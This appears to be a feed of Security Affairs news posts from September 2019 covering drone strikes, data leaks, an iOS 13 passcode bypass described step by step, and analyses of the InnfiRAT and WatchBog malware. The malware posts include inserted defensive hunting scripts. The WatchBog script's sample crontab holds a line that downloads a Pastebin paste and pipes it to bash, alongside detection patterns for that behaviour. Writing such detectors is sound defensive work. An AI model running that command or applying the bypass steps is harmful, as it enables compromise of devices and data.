Posted at 9/15/19 6:45am
Drone attacks have hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them the Abqaiq site.

Saudi Arabia’s oil production suffered severe damage following a swarm of explosive drones that hit two major oil facilities run by the state-owned company Aramco.

Images of a huge blaze at Abqaiq, the site of Aramco’s largest oil processing plant, are circulating online. A second drone attack hit the Khurais oilfield. Abqaiq is about 60km south-west of Dhahran, while Khurais, 200km further south-west, is the second-largest oilfield in the country.

According to local media, the emergency response of the fire brigade teams brought the fires at both facilities under control.

The two facilities are located in Abqaiq and Khurais, Saudi Arabia’s interior ministry said. (Photo: Twitter videograb | @Sumol67)

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant; according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

10 explosive drones, claimed by Houthi rebels in Yemen, attacked the world's biggest oil processing plant in Saudi Arabia, disrupting the heart of the kingdom's oil industry pic.twitter.com/dhiLyR5QL4

— Bloomberg TicToc (@tictoc) September 14, 2019

The group is threatening Saudi Arabia with further attacks. The Iran-aligned Houthi rebel movement has been fighting the Yemeni government and a coalition of regional countries led by Saudi Arabia since 2015, when President Abdrabbuh Mansour Hadi was kicked out of Sanaa by the Houthis.

“The military spokesman, Yahya Sarea, told al-Masirah TV, which is owned by the Houthi movement and is based in Beirut, that further attacks could be expected in the future.” reported the BBC.

“He said Saturday’s attack was one of the biggest operations the Houthi forces had undertaken inside Saudi Arabia and was carried out in “co-operation with the honourable people inside the kingdom”.”

Secretary of State Mike Pompeo blamed Iran for coordinating the attacks, adding that the world is facing an unprecedented attack on its energy supply.

We call on all nations to publicly and unequivocally condemn Iran’s attacks. The United States will work with our partners and allies to ensure that energy markets remain well supplied and Iran is held accountable for its aggression

— Secretary Pompeo (@SecPompeo) September 14, 2019

Officials have attributed the attacks to a specific threat actor:

“At 04:00 (01:00 GMT), the industrial security teams of Aramco started dealing with fires at two of its facilities in Abqaiq and Khurais as a result of… drones,” the official Saudi Press Agency reported. “The two fires have been controlled.”

The attacks will have a dramatic impact on Saudi Arabia’s oil supply, which could be cut by 50 percent following the incidents.

These latest attacks demonstrate the potential impact of drone attacks against critical infrastructure; at the time of writing it is not clear whether the Houthi group used weaponized commercial civilian drones or obtained military support from Iran.

“The Saudi Air Force has been pummelling targets in Yemen for years. Now the Houthis have a capable, if much more limited, ability to strike back. It shows that the era of armed drone operations being restricted to a handful of major nations is now over.” continues the BBC.

Groups like the Houthis and Hezbollah have access to drone technology and could use it in sophisticated operations. Intelligence analysts fear that escalating tensions in the region could trigger a world oil crisis.


Pierluigi Paganini

(SecurityAffairs – drone attacks, Saudi Arabia)

The post Drone attacks hit two Saudi Arabia Aramco oil plants appeared first on Security Affairs.

[Category: Breaking News, Security, drone attacks, Hacking, information security news, Oil, Pierluigi Paganini, Saudi Arabia, Saudi Aramco, Security Affairs, security news, Security News]

Posted at 9/15/19 4:49am
A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

  • Experts found Joker Spyware in 24 apps in the Google Play store
  • Toyota Boshoku Corporation lost over $37 Million following BEC attack
  • University, Professional Certification or Direct Experience?
  • WordPress 5.2.3 fixes multiple issues, including some severe XSS flaws
  • Belarusian authorities seized XakFor, one of the largest Russian-speaking hacker sites
  • China-linked APT3 was able to modify stolen NSA cyberweapons
  • Stealth Falcon New Malware Uses Windows BITS Service to Stealthy Exfiltrate Data
  • Stealth Falcon’s undocumented backdoor uses Windows BITS to exfiltrate data
  • Symantec uncovered the link between China-Linked Thrip and Billbug groups
  • Telegram Privacy Fails Again
  • Wikipedia suffered intermittent outages as a result of a malicious attack
  • DoS attack that caused disruption at US power utility exploited a known flaw
  • Million of Telestar Digital GmbH IoT radio devices can be remotely hacked
  • Police dismantled Europe’s second-largest counterfeit currency network on the dark web
  • Robert Downey Jr’s Instagram account has been hacked
  • Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player
  • Dissecting the 10k Lines of the new TrickBot Dropper
  • Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks
  • NetCAT attack allows hackers to steal sensitive data from Intel CPUs
  • Some models of Comba and D-Link WiFi routers leak admin credentials
  • The Wolcott school district suffered a second ransomware attack in 4 months
  • Iran-linked group Cobalt Dickens hit over 60 universities worldwide
  • LokiBot info stealer involved in a targeted attack on a US Company
  • SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News
  • SimJacker attack allows hacking any phone with just an SMS
  • Poland to establish Cyberspace Defence Force by 2024
  • The US Treasury placed sanctions on North Korea linked APT Groups
  • WatchBog cryptomining botnet now uses Pastebin for C2
  • Expert disclosed passcode bypass bug in iOS 13 a week before its release
  • Hackers stole payment data from Garmin South Africa shopping portal
  • InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 231 appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Deep Web, Hacking, Internet of Things, Malware, information security news, Newsletter, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/15/19 3:44am
A researcher discovered an unsecured database exposed online, belonging to the car dealership marketing firm Dealer Leads and containing 198 million records.

The researcher Jeremiah Fowler discovered an unsecured database exposed online belonging to the car dealership marketing firm Dealer Leads.

The archive contained 198 million records, a total of 413GB of data, including information on potential car buyers, vehicles, loan and finance inquiries, log data with visitors’ IP addresses, and more.

“On August 19th I reported a non-password protected database that contained a massive 413GB of data and a total of 198 million records. The most shocking part was that I had seen this dataset several times in the previous weeks, but was unable to identify the owner.” reports Security Discovery. “I spent several days trying to identify the owner of the database and there was no clear indication in the millions of records.”

Dealer Leads provides content relevant to the auto industry for franchise and independent car dealerships; the company’s website describes it with the following statement.

“dominates the automotive digital marketing industry with highly used automobile search strings turned into online inventory advertising classified sites, service sites, finance sites etc. Car shoppers have needs, and DealerLeads matches those needs in live searches.”

The Elastic database was accessible to anyone with a browser; its records included names, emails, phone numbers, addresses, IP addresses, and other sensitive or identifying information, all in plain text.

The archive also included IP addresses, ports, pathways, and storage info.

The good news is that after the expert reported his discovery to the company, it secured the database, restricting public access to the archive.

At the time of writing it is not clear how long the data remained exposed online or whether anyone else accessed its records.

“Dealer Leads acted fast to restrict public access immediately after the notification. Unfortunately, the data was exposed for an undetermined length of time and it is unclear who else may have had access to the millions of records that were publicly exposed.” Security Discovery concludes.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network applicants and potential customers may not know if their data was exposed,”


Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Dealer Leads, a car dealer marketing firm exposed 198 Million records online appeared first on Security Affairs.

[Category: Breaking News, Data Breach, data leak, Dealer Leads, hacking news, information security news, Pierluigi Paganini, privacy, Security Affairs, Security news]

Posted at 9/15/19 2:23am
Facebook addressed a vulnerability in Instagram that could have allowed attackers to access private user information.

The security researcher @ZHacker13 discovered a flaw in Instagram that allowed an attacker to access account information, including user phone number and real name.

ZHacker13 discovered the vulnerability in August and reported the issue to Facebook, which asked for additional time to address it. The social network giant has finally fixed the flaw.

“In putting this article together, I had the security researcher run tests on the platform and he successfully retrieved “secure” user data I know to be real. This data included users’ real names, Instagram account numbers and handles, and full phone numbers.” reads a post published by Forbes. “The linking of this data is all an attacker would need to target those users. It would also enable automated scripts and bots to build user databases that could be searched, linking high-profile or highly-vulnerable users with their contact details.”

The expert also warns that attackers could use automated scripts and bots to collect user data from the platform, linking users with their contact details.

Just a week before ZHacker13 disclosed the bug, phone numbers associated with 419 million accounts of the social network giant were exposed online.

It is not clear if the two incidents could have the same root cause.

“I found a high vulnerability on Instagram that can cause a serious data leak,” @ZHacker13 told Forbes. “The vulnerability is still active—and it looks like Facebook are not very serious about patching it.” “Exploiting this vulnerability would enable an attacker using an army of bots and processors to build a searchable/attackable database of users, bypassing protections protecting that data.”

The expert explained that he discovered the flaw by using the platform’s contact importer combined with a brute-force attack on its login form.

The attack scenario consists of two steps:

  • The attacker carries out a brute force attack on Instagram’s login form, checking one phone number at a time for those linked to a live Instagram account.
  • The attacker finds the account name and number linked to the phone number by exploiting Instagram’s Sync Contacts feature.

A Facebook spokesman explained that his company modified the contact importer in Instagram to address the flaw.

“We have changed the contact importer on Instagram to help prevent potential abuse. We are grateful to the researcher who raised this issue, and to the entire research community for their efforts,” said the spokesman.

Facebook, after initial resistance, confirmed it is considering rewarding @ZHacker13 for reporting the bug as part of its bug bounty program.

“Facebook had also told @ZHacker13 that although the vulnerability was serious, there was internal awareness of the issue and so it was not eligible for a reward under the bounty scheme.” continues the post. “This would have set a terrible precedent and disincentivized researchers from coming forwards with similar vulnerabilities. I questioned Facebook on its decision, and the company reconsidered and told me it has “reassessed” the discovery of the bug and would reward the researcher after all.”

Facebook pointed out that there is no evidence that any user data has been abused by threat actors.


Pierluigi Paganini

(SecurityAffairs – Instagram, hacking)

The post A bug in Instagram exposed user accounts and phone numbers appeared first on Security Affairs.

[Category: Breaking News, Hacking, Facebook, hacking news, information security news, Instagram, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/14/19 2:05pm
A security researcher disclosed a passcode bypass just a week before Apple’s planned release of the new iOS 13 operating system on September 19.

Apple users are thrilled for the release of the iOS 13 mobile operating system planned for September 19, but a security expert could mess up the party.

The security researcher Jose Rodriguez discovered a passcode bypass issue that could be exploited by attackers to gain access to iPhone contacts and other information even on locked devices.

Below is the step-by-step procedure for the passcode bypass:

  1. Reply to an incoming call with a custom message.
  2. Enable the VoiceOver feature.
  3. Disable the VoiceOver feature.
  4. Add a new contact to the custom message.
  5. Click on the contact’s image to open the options menu and select “Add to existing contact”.
  6. When the list of contacts appears, tap on the other contact to view its info.

Below is the video PoC published by Rodriguez that shows how to view a device’s contact information.

Rodriguez reported the flaw to Apple on July 17th, 2019, when the new iOS version was still in beta. The expert disclosed the issue on September 11th, and at that time Apple had still not addressed the flaw.

Experts hope that Apple will be able to fix the bug by September 19th.

Rodriguez has discovered many other passcode bypass issues in the past. In October 2018, a few hours after Apple released iOS 12.1, the iPhone bug hunter found a new passcode bypass issue that could have been exploited to see all contacts’ private information on a locked iPhone.

A few weeks before that, he discovered another passcode bypass vulnerability in Apple’s iOS 12 that could have been exploited to access photos and contacts on a locked iPhone XS.

The researcher also disclosed a new passcode bypass flaw that could have been exploited to access photos and contacts on a locked iPhone XS.


Pierluigi Paganini

(SecurityAffairs – iOS 13, passcode bypass)

The post Expert disclosed passcode bypass bug in iOS 13 a week before its release appeared first on Security Affairs.

[Category: Breaking News, Hacking, Mobile, Apple, information security news, ios 13, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/14/19 9:33am
Researchers at Zscaler have spotted a new malware dubbed InnfiRAT that infects victims’ systems to steal cryptocurrency wallet data.

Researchers at Zscaler have discovered a new Trojan dubbed InnfiRAT that implements many standard Trojan capabilities along with the ability to steal cryptocurrency wallet data.

“As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user’s computer.” states a blog post published by Zscaler. “Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data.”

Upon execution, the malware first checks whether it is running from the %AppData% directory under the name NvidiaDriver.exe. The malware then checks for network connectivity by making a request to “iplogger[.]com/1HEt47,” and records all the running processes in an array to check whether any of them is running under the name NvidiaDriver.exe. If it finds a process running with this name, it kills that process and waits for it to exit.

The malicious code will make a copy of itself in the AppData directory before writing a Base64-encoded PE file in memory to execute the main component of the Trojan.

As execution of the malware starts, it checks for the presence of a virtualized environment that could be used by researchers to analyze the threat. If the malware is not running in a sandbox, it will contact the command-and-control (C2) server, transfer the information stolen from the machine, and await further commands.

The InnfiRAT Trojan can also deploy additional payloads to steal files, capture browser cookies to harvest stored credentials for various online services and grab open sessions. The malware is also able to shut down traditional antivirus processes.

InnfiRAT scans the machine for files associated with Bitcoin (BTC) and Litecoin (LTC) wallets (Litecoin: %AppData%\Litecoin\wallet.dat, Bitcoin: %AppData%\Bitcoin\wallet.dat); if they are present, the malicious code siphons the existing data in an attempt to steal the victims’ funds.
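As an added example (not Zscaler’s or this post’s own code), the detection logic below hunts for the two InnfiRAT behaviours described above in constructed endpoint telemetry: a process named NvidiaDriver.exe launched from %AppData%, and a read of a Bitcoin or Litecoin wallet.dat by a process that is not a wallet application. The ‘|’-separated key=value record format and the WALLET_APPS allow-list are this example’s assumptions.

```python
"""Hunt for the InnfiRAT behaviours described above in endpoint telemetry.
Added example on constructed events; the '|'-separated key=value record
format and the WALLET_APPS allow-list are this example's assumptions."""
from dataclasses import dataclass

# From the write-up: the RAT runs as NvidiaDriver.exe from %AppData%
# (i.e. ...\AppData\Roaming) and reads the Bitcoin/Litecoin wallet files there.
RAT_IMAGE_NAME = "nvidiadriver.exe"
APPDATA_MARK = "\\appdata\\roaming\\"
WALLET_FILES = (
    "\\appdata\\roaming\\bitcoin\\wallet.dat",
    "\\appdata\\roaming\\litecoin\\wallet.dat",
)
# Binaries expected to open wallet.dat on a workstation (assumption; tune per site).
WALLET_APPS = {"bitcoin-qt.exe", "bitcoind.exe", "litecoin-qt.exe", "litecoind.exe"}


@dataclass
class Finding:
    rule: str
    detail: str


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' record (constructed format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def check_event(ev: dict) -> list:
    """Apply both rules to a single parsed event."""
    findings = []
    image = ev.get("image", "")
    kind = ev.get("type", "").lower()
    if kind == "process_create":
        # The name alone is weak; the RAT's tell is that name under the roaming profile.
        if _basename(image) == RAT_IMAGE_NAME and APPDATA_MARK in _norm(image):
            findings.append(Finding("innfirat_appdata_process", image))
    elif kind == "file_read":
        target = _norm(ev.get("target", ""))
        if target.endswith(WALLET_FILES) and _basename(image) not in WALLET_APPS:
            findings.append(Finding("wallet_dat_read_by_unexpected_process",
                                    f"{image} -> {ev.get('target')}"))
    return findings


def hunt(lines) -> list:
    """Run every rule over an iterable of records and collect the findings."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(check_event(parse_event(line)))
    return findings


# Constructed sample telemetry (not real logs). Event 1 shows that the name
# alone, outside %AppData%, does not fire the rule.
SAMPLE_LOG = """\
type=process_create|image=C:\\Program Files\\Example Vendor\\NvidiaDriver.exe|pid=4021
type=process_create|image=C:\\Users\\alice\\AppData\\Roaming\\NvidiaDriver.exe|pid=5120
type=file_read|image=C:\\Users\\alice\\AppData\\Roaming\\NvidiaDriver.exe|target=C:\\Users\\alice\\AppData\\Roaming\\Bitcoin\\wallet.dat
type=file_read|image=C:\\Program Files\\Bitcoin\\bitcoin-qt.exe|target=C:\\Users\\alice\\AppData\\Roaming\\Bitcoin\\wallet.dat
type=file_read|image=C:\\Users\\alice\\AppData\\Roaming\\NvidiaDriver.exe|target=C:\\Users\\alice\\AppData\\Roaming\\Litecoin\\wallet.dat
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"[{f.rule}] {f.detail}")
```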


“Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren’t from a trusted source.” conclude the researchers.


Pierluigi Paganini

(SecurityAffairs – InnfiRAT, hacking)

The post InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets appeared first on Security Affairs.

[Category: Breaking News, Malware, Bitcoin, Hacking, information security news, InnfiRAT, malware, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/14/19 6:50am
Garmin, the multinational company focused on GPS technology for automotive, aviation, marine, outdoor, and sport activities, is the victim of a data breach.

Garmin is the victim of a data breach; it is warning customers in South Africa who shopped on the shop.garmin.co.za portal that their personal information and payment data were exposed.


The stolen data included customers’ home addresses, phone numbers, emails, and credit card information that could be used to make purchases (i.e. card number, expiration date and CVV code for the payment card).

“We recently discovered theft of customer data from orders placed through shop.garmin.co.za (operated by Garmin South Africa) that compromised your personal data related to an order that you placed through the website,” said Jennifer Van Niekerk, South Africa Managing Director.

“The compromised data was limited to only Garmin’s South Africa site, and contained payment information, including the number, expiration date and CVV code for your payment card, along with your first and last name, physical address, phone number and email address.”

Garmin SA recommends that customers review and monitor all their payment card records for unexpected purchases; it seems that the company is not offering impacted customers any fraud protection service.

Impacted customers have to contact their bank or payment card provider.

The breached shopping portal was running the popular Magento ecommerce platform; it was shut down after the security breach was discovered.

The Register contacted Garmin South Africa for more information on the incident; the company confirmed that the attackers used a software skimmer to siphon customers’ payment details.

Garmin explained that the e-commerce site “was operated by a third party on behalf of Garmin South Africa.”

“Promptly after learning of this incident, we immediately shut down the impacted system, began an investigation, and contacted the South African Information Regulator.” Garmin told El Reg.

“While Garmin does not store credit card information, the unauthorized party leveraged virtual skimming technology to capture customer details at the time of input, including credit card information.” It added that the incident was isolated to a few thousand customers who accessed the SA portal: “This incident affected less than 6,700 customers in South Africa and does not affect customers who purchased from other Garmin websites in other regions.”

Most attacks of this kind have been carried out by the umbrella of hacking crews tracked as Magecart, but at the time of writing no security firm had demonstrated their involvement in this incident.


Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Hackers stole payment data from Garmin South Africa shopping portal appeared first on Security Affairs.

[Category: Breaking News, Data Breach, Hacking, data breach, Garmin, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/13/19 2:21pm
The US Treasury placed sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The US Treasury has placed sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The groups are behind several hacking operations that resulted in the theft of hundreds of millions of dollars from financial institutions and cryptocurrency exchanges worldwide, as well as destructive cyber-attacks on infrastructure. Lazarus Group is also considered the threat actor behind the massive 2018 WannaCry attack.

According to the Treasury, the three groups “likely” stole $571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Intelligence analysts believe the groups are under the control of the Reconnaissance General Bureau, which is North Korea’s primary intelligence bureau.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence.

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.

Bluenoroff is considered a sub-group of the Lazarus APT that was formed by the North Korean government to earn revenue from hacking campaigns in response to increased global sanctions.

“According to industry and press reporting, by 2018, Bluenoroff had attempted to steal over $1.1 billion dollars from financial institutions and, according to press reports, had successfully carried out such operations against banks in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam.” continues the US Treasury.

Andariel is another Lazarus subgroup that focuses on targeting businesses, government agencies, and individuals. It has conducted multiple attacks aimed at stealing bank card information, as well as attacks on ATMs.

Andariel carried out cyber attacks against online gambling and poker sites.

The sanctions placed by the US Treasury aim to block the groups’ access to the global financial system and to freeze any assets held under US jurisdiction.

“As a result of today’s action, all property and interests in property of these entities, and of any entities that are owned, directly or indirectly, 50 percent or more by the designated entities, that are in the United States or in the possession or control of U.S. persons are blocked and must be reported to OFAC.” states the US Treasury. “OFAC’s regulations generally prohibit all dealings by U.S. persons or within (or transiting) the United States that involve any property or interests in property of blocked or designated persons.”


Pierluigi Paganini

(SecurityAffairs – North Korea, hacking)

The post The US Treasury placed sanctions on North Korea linked APT Groups appeared first on Security Affairs.

[Category: APT, Breaking News, Hacking, Laws and regulations, hacking news, information security news, malware, North Korea, Pierluigi Paganini, Security Affairs, Security News]

Posted at 9/13/19 12:04pm
A new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control (C&C) operations.

Cisco Talos researchers discovered a new cryptocurrency-mining botnet, tracked as WatchBog, that is heavily using the Pastebin service for command and control.

The WatchBog bot is a Linux-based malware that has been active since last year; it targets systems to mine the Monero cryptocurrency.

“Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.” states the analysis published by Cisco Talos.

“This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins.”

Recently, experts at Intezer spotted a strain of the Linux miner that also scans the Internet for Windows RDP servers vulnerable to BlueKeep.


The new WatchBog variant includes a new spreader module along with exploits for the following recently patched vulnerabilities in Linux applications:

The malware also includes scanners for Jira and Solr flaws, along with a brute-forcing module for CouchDB and Redis installs.

The operators behind the WatchBog botnet claim to be able to identify vulnerabilities in enterprise systems “before any ‘real’ hackers could do so,” and offer their protection services. However, every time the operators identify vulnerable hosts, the systems are recruited into the crypto-mining botnet.

“During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary.” continues Talos.

During the installation phase, the bot checks for running processes associated with other cryptocurrency miners, then it will use a script to terminate them.

It then determines whether it can write to various directories, checks the system architecture, and makes three attempts to download and install a ‘kerberods’ dropper using wget or curl.

The installation script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information, then downloads the miner. The script also checks whether the ‘watchbog’ process is running; if it is not found, the ‘testa’ or ‘download’ functions are called to install the version of the miner that matches the target architecture.

The ‘testa’ function is used to facilitate the infection process and is responsible for writing the various configuration data used by the miner.

The script downloads encoded Pastebins as a text file and gives it execution permissions. The script finally starts the Watchbog process and deletes the text file.

The ‘download’ function performs similar operations by writing the contents retrieved from various file locations; once it has determined the target architecture, it installs the appropriate miner.

WatchBog uses SSH for lateral movement; a specific script also checks for the existence of SSH keys on the compromised system in an attempt to use them against other systems.

Talos researchers also noticed that threat actors leverage a Python script that scans for open Jenkins and Redis ports on the host’s subnet for lateral movement. Attackers also rely on cron jobs to achieve persistence and attempt to cover their tracks by erasing or overwriting files and logs.
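An added example, not Talos’s or the post’s own code: the check below scans constructed crontab lines for the persistence pattern described above, a cron job that fetches a raw Pastebin URL with curl or wget and hands the result to a shell, with all output silenced. The regular expressions, the /tmp heuristic and the sample crontab are this example’s own assumptions.

```python
"""Hunt crontab entries for the WatchBog persistence pattern: a scheduled
job that downloads a raw Pastebin paste and executes it.  Added example
with constructed input; patterns and heuristics are this example's own."""
import re

FETCH_RE = re.compile(r"\b(curl|wget)\b")
PASTE_RE = re.compile(r"pastebin\.com/raw/\w+", re.IGNORECASE)
# Downloaded content handed to a shell, directly or after base64 decoding.
EXEC_RE = re.compile(r"\|\s*(ba)?sh\b|base64\s+(-d|--decode)\b")
# World-writable locations a cron job has no business executing from
# (a generic heuristic added here, not something taken from the write-up).
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def crontab_entries(text):
    """Yield (schedule, command) from crontab text, skipping comments,
    blank lines and VAR=value assignments."""
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        parts = s.split(None, 5)          # five schedule fields + command
        if len(parts) < 6:
            continue
        yield " ".join(parts[:5]), parts[5]


def classify(cmd):
    """Return the list of reasons a cron command looks like WatchBog-style
    persistence; an empty list means nothing matched."""
    reasons = []
    if PASTE_RE.search(cmd):
        reasons.append("pastebin_raw_url")
    if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("download_piped_to_shell")
    if cmd.split()[0].startswith(TMP_DIRS):
        reasons.append("exec_from_tmp")
    # Silencing all output is normal for cron, but combined with the above
    # it is consistent with the track-covering the report describes.
    if reasons and "/dev/null" in cmd and "2>&1" in cmd:
        reasons.append("output_silenced")
    return reasons


def suspicious_cron(text):
    """Return [(schedule, command, reasons)] for the entries that matched."""
    hits = []
    for sched, cmd in crontab_entries(text):
        reasons = classify(cmd)
        if reasons:
            hits.append((sched, cmd, reasons))
    return hits


# Constructed sample crontab (not captured from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE01 || wget -qO- https://pastebin.com/raw/EXAMPLE01) | base64 -d | bash > /dev/null 2>&1
30 2 * * 0 /opt/backup/run.sh >> /var/log/backup.log 2>&1
* * * * * /tmp/watchbog >/dev/null 2>&1
"""

if __name__ == "__main__":
    for sched, cmd, reasons in suspicious_cron(SAMPLE_CRONTAB):
        print(f"{sched}  {cmd}\n    -> {', '.join(reasons)}")
```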

“Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed.” concludes the report. “The best way to prevent such activity would be to ensure that all enterprise web applications are up to date,” Talos notes.


Pierluigi Paganini

(SecurityAffairs – WatchBog, malware)

The post WatchBog cryptomining botnet now uses Pastebin for C2 appeared first on Security Affairs.

[Category: Breaking News, Hacking, Malware, hacking news, information security news, malware, Pierluigi Paganini, Security Affairs, Security News]

Posted 9/13/19 12:51am
Poland announced it will launch a cyberspace defense force by 2024 composed of around 2,000 soldiers with deep knowledge of cybersecurity.

Polish Defence Minister Mariusz Blaszczak has approved the creation of a cyberspace defence force by 2024; it will be composed of around 2,000 soldiers with deep expertise in cybersecurity.

The news was reported by AFP; Blaszczak announced that the cyber command unit would start its operations in 2022.

“We’re well aware that in today’s world it’s possible to influence the situation in states by using these methods (cyberwar),” Mariusz Blaszczak told local media at a military cyber training centre in Zegrze.

Poland Cyberspace Defence Force

The defence ministry is already looking for talent with the help of the HackYeah hackathon and is offering cash prizes to the most skilled hackers. The HackYeah hackathon is one of the most important hacking events in Europe; according to the Polish government, it will attract many talents and encourage youngsters to take up a new profession.

The Ministry also added that Poland would have enough IT graduates by 2024 to provide the force with 2,000 personnel qualified in cyberdefense.

“Poland’s defense ministry is already looking for talent by partnering with the HackYeah hackathon to offer a total of 30,000 zlotys (6,900 euros, $7,650) in cash prizes for top hackers, according to a post on the ministry’s website,” states the AFP agency.


Pierluigi Paganini

(SecurityAffairs – Poland, Cyberspace Defense Force)

The post Poland to establish Cyberspace Defence Force by 2024 appeared first on Security Affairs.

[Category: Breaking News, Cyber warfare, Cyberspace Defence Force, Hacking, hacking news, information security news, military, Pierluigi Paganini, Poland, Security Affairs, Security News]

Posted 9/12/19 4:03pm
SimJacker is a critical vulnerability in SIM cards that could be exploited by remote attackers to compromise any phone just by sending an SMS.

Cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser, a dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm has been aware of the zero-day flaw for at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

“AdaptiveMobile Security have uncovered a new and previously undetected vulnerability and associated exploits, called Simjacker. This vulnerability is currently being actively exploited by a specific private company that works with governments to monitor individuals,” states a post published by AdaptiveMobile.

The S@T Browser application is installed on multiple SIM cards, including eSIMs, as part of the SIM Tool Kit (STK); it enables the SIM card to initiate actions that can be used for various value-added services.

The S@T Browser implements a series of STK instructions (i.e. send short message, set up call, launch browser, provide local data, run command, and send data) that can be triggered by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to:

  • Retrieve the targeted device’s location and IMEI information,
  • Spread misinformation by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing the victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

The experts explained that the attack is transparent to the users; the targets are not able to notice any anomaly.

“The main Simjacker attack involves an SMS containing a specific type of spyware-like code being sent to a mobile phone, which then instructs the SIM Card within the phone to ‘take over’ the mobile phone to retrieve and perform sensitive commands.” continues the post.

“During the attack, the user is completely unaware that they received the attack, that information was retrieved, and that it was successfully exfiltrated.”

The experts revealed that they observed SimJacker attacks against users of the most popular mobile devices manufactured by Apple, Google, Huawei, Motorola, and Samsung.

According to the researchers, almost any mobile phone model is vulnerable to the SimJacker attack because it leverages a component on SIM cards whose specifications have remained the same since 2009.

“The Simjacker vulnerability could extend to over 1 billion mobile phone users globally, potentially impacting countries in the Americas, West Africa, Europe, Middle East and indeed any region of the world where this SIM card technology is in use.” states the post.

The researchers plan to disclose technical details of the attack at the VB2019 London conference, in October 2019.

“Simjacker represents a clear danger to the mobile operators and subscribers. This is potentially the most sophisticated attack ever seen over core mobile networks,” said Cathal McDaid, CTO of AdaptiveMobile Security, in a press release. “Simjacker worked so well and was being successfully exploited for years because it took advantage of a combination of complex interfaces and obscure technologies, showing that mobile operators cannot rely on standard established defences. Now that this vulnerability has been revealed, we fully expect the exploit authors and other malicious actors will try to evolve these attacks into other areas.”

